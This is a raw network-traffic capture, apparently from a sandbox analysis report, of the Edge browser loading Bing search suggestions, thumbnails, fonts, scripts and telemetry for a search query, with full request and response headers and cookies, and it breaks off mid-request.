SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=1209600
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4779
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec7e6
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vi&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vi&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 1258
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d47dd14946898461e54a8e0170
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-RhvgRR/5chlzpXKnio39GsYcPuB4Qa6yrxjwB1sza0U='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec8b7
GET

https://www.bing.com/th?id=OSK._vzDUekSctUDhNYvDOIBNkScdAI6uPBYoFGsGsQbcPU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK._vzDUekSctUDhNYvDOIBNkScdAI6uPBYoFGsGsQbcPU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4649
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ecca6
GET

https://www.bing.com/th?id=OSK.AHmLqMpP2qROuTUoOByD0OvwrI_egv3-LCqF6fRe3gM&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.AHmLqMpP2qROuTUoOByD0OvwrI_egv3-LCqF6fRe3gM&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5828
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144341.184ecd4b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 265
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1
GET

https://www.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
DNT: 1
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 15344
Content-Type: font/woff2
Cache-Control: public, max-age=15552000
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-sHgI2KF5qU4AQ3xCUQckckSpf+W62hm+BtSCl7vQoVg='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Date: Sat, 05 Oct 2024 16:05:26 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144326.184e6208
GET

https://www.bing.com/rp/9JZoMKGwSFpYBOFiek9nl1XTYtg.br.js

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /rp/9JZoMKGwSFpYBOFiek9nl1XTYtg.br.js HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
DNT: 1
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Last-Modified: Mon, 12 Aug 2024 22:08:22 GMT
ETag: 0x8DCBB1B47B44BB4
Akamai-GRN: 0.86777b5c.1727432834.82e8989
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Type: text/javascript; charset=utf-8
Content-MD5: 4PCNB8MnGBDQITkYL2LfHg==
x-ms-request-id: 98edd3a4-601e-0015-5b90-09131f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 7512
Vary: Accept-Encoding
Akamai-GRN: 0.92777b5c.1727852187.1e923be9
Cache-Control: public, no-transform, max-age=389150
Expires: Sun, 06 Oct 2024 22:28:36 GMT
Akamai-GRN: 0.ad777b5c.1727864566.234a3b1
Timing-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:26 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144326.184e62d7
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; 